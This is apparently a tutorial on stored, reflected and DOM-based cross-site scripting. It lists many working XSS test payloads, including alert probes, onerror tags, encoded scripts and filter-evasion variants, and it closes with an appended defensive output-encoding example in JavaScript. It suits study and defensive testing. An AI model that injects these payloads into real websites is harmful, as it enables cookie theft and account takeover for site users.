What are the types of Cross-Site Scripting vulnerability?
Cross-site Scripting can be classified into three major categories — Stored XSS, Reflected XSS, and DOM-based XSS.
Stored Cross-Site Scripting (Persistent XSS) Vulnerability
Using a stolen session cookie, the attacker can gain access to the user's account and thereby easy access to the user's personal information.
Reflected Cross-site scripting vulnerability
In a reflected XSS attack, the attacker's payload is mostly sent with the request itself: the server's response includes the payload given in the HTTP request, so it is reflected back into the user's browser. Reflected XSS is not persistent in nature, hence the attacker needs to push the payload to every victim individually by different means such as social engineering. Attackers send links via email or other delivery methods to get the payload to the user, in order to gain access to cookies or session IDs.
Cross-site scripting (XSS) vulnerability Payloads Basics:
Example: <a onmouseover=alert('HERE ITS XSS')>I AM HERE </a>
In the payload given below, the img src attribute tries to load an image called x, which is not present on the web server, hence the onerror event gets triggered without any user interaction and an alert window showing XSS appears on the page.
Example: <img src=x onerror=alert(String.fromCharCode(88,83,83));>
Below are a few recent XSS payloads:
<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
http://site.com/somefuntion.php?session="oncut=" '&direct=true&from=true&r=select_down& plang=' |alert|
Hex encoding can be applied in two formats:
Payload <script>alert(document.domain)</script> will be encoded as: \u003cscript\u003ealert(document.domain);\u003c/script\u003e
Some interesting payloads are listed here:
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<img src ?itworksonchrome?\/onerror = alert(1)
<? foo="><x foo='?><script>alert(1)</script>'>">
<sCript x>(((confirm)))``</script x>
XSS payloads can be generated according to the HTML context in which the application places the input. If you have any doubts about XSS, you can ask in the comment section below.
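As an added defensive example that is not part of the original post, the following JavaScript shows context-aware output encoding that renders the payloads listed above inert when untrusted input lands in an HTML text node, a quoted attribute, or an href; encodeForHtml, htmlAttribute, safeHref and renderComment are hypothetical names chosen for this example.

```javascript
// Added example (not from the original post): context-aware output encoding
// that neutralises the kind of payloads shown above. Each output context
// (HTML text, quoted attribute, URL) gets its own encoder.

// Characters that can break out of an HTML text or attribute context.
// '/' and '`' are encoded too, which also defeats the unquoted-attribute
// trick in the <input ... value=`` payload listed above.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;',
};

function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'`\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Attribute values are always wrapped in double quotes after encoding so a
// caller cannot forget the quotes; event-handler attribute names (on*) and
// malformed names are refused outright.
function htmlAttribute(name, untrusted) {
  if (!/^[a-zA-Z][a-zA-Z0-9-]*$/.test(name) || /^on/i.test(name)) {
    throw new Error(`refusing to emit attribute "${name}"`);
  }
  return `${name}="${encodeForHtml(untrusted)}"`;
}

// URLs are a separate context: only absolute http(s) URLs are accepted,
// which rejects javascript:, data: and scheme-relative values such as the
// //google.com target in the <animate> payload above (new URL() throws on
// a relative value because no base is given).
function safeHref(untrusted) {
  let u;
  try { u = new URL(String(untrusted)); } catch { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
}

// Render a stored comment the way a stored-XSS-prone page would, but encoded.
function renderComment(author, body) {
  return `<p ${htmlAttribute('data-author', author)}>${encodeForHtml(body)}</p>`;
}

// Constructed sample input reusing the page's two basic payloads.
const SAMPLE = [
  "<a onmouseover=alert('HERE ITS XSS')>I AM HERE </a>",
  "<img src=x onerror=alert(String.fromCharCode(88,83,83));>",
];

// True when the rendered markup contains no raw tag or attribute delimiter
// between the fixed <p ...> wrapper and its closing tag.
function isInert(rendered) {
  const inner = rendered.slice(rendered.indexOf('>') + 1, rendered.lastIndexOf('</p>'));
  return !/[<>"'`]/.test(inner);
}
```

Run it with `SAMPLE.map((p) => renderComment('anon', p))` to see the encoded markup; each result passes isInert because every delimiter in the payload became an entity.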